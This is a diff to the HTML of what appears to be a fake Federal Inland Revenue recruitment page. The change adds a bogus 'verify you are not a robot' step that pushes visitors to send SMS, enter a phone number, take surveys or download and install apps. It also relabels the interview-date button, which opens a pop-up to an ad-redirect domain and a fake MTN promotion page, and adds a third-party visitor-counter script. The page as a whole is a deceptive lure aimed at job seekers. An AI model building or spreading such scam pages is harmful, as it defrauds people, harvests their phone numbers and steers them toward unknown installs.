--- a/Federal-Inland-Rev-Recruitment-Form.html
+++ b/Federal-Inland-Rev-Recruitment-Form.html
@@ -608,17 +608,21 @@ value="Airtel">Abia</option>
         </div>
         <div id="claim">
             <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
-            <p class="title">Congratulations! Your Interview Date Is Ready.</p>
-                <b>..</b>
+            <p class="title">Congratulations! The final verification step, you need to confirm that you are not a robot.</p>
+                <b>Verification methods; We can ask you; Send SMS, download, enter a phone number, take a survey, install an app or any other task assigned to verify your phone number..</b>
                 <br><b>Remember that this step is very important. Don't skip any steps.</b><br/>
 
 
 
  <br/>
           <a  onclick="window.open('//thaudray.com/4/3077182')" href="https://africa-day-mtn-celebration.blogspot.com/#1729238057630" >
-                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">GET INTERVIEW DATE</font></button>
+                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">COMFIRM INTERVIEW DATE</font></button>
                     </a><br/>
           
+<!-- BEGIN: Powered by Supercounters.com -->
+<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_t.js"></script><script type="text/javascript">sc_online_t(1700892,"","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">supercounters.com</a></noscript>
+</center>
+<!-- END: Powered by Supercounters.com -->
 
 
           <a  onclick="window.open('//thaudray.com/4/3077182')" href="https://africa-day-mtn-celebration.blogspot.com/#1729238057630" >
